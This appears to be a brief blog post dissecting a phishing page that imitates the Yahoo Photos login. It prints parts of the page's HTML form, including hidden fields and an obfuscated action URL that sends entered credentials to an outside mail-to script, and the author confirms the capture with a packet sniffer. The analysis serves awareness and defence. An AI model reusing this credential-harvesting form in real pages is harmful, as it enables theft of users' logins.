Recently, I have been getting a lot of messages from people in my Yahoo list, which reads something like this :
Strange, I thought. The geocities homepage shows up similar to the Yahoo Photos page, prompting me for a loginid/passwd. I thought something was not right. On downloading the page, and reading through the HTML source, I could see something like this :
< FORM METHOD="POST" ACTION="http://www2
cgi" ENCTYPE="x-www-form-urlencoded"> <INPUT TYPE="hidden" NAME="Mail_From" VALUE="Yahoo">
<INPUT TYPE="hidden" NAME="Mail_To" VALUE="firstname.lastname@example.org"> <INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Yahoo id">
<INPUT TYPE="hidden" NAME="Next_Page" VALUE="http://photo
On converting the integer values to ASCII characters it looked something like this :
FORM METHOD="POST" ACTION="http://www2.fiberbit.net/form/mailto.cgi" ENCTYPE="x-www-form-urlencoded">
I started ethereal to check out what data is being transmitted. I used a fake userid and password, and I could see that the credentials were being transmitted to the mailto.cgi form on that website. I think, it mails out the credentials to that gmail id, and once it has a valid password, it would get a list of my contacts and send that malicious message to all of them as well...
An example of "Semantic Attacks".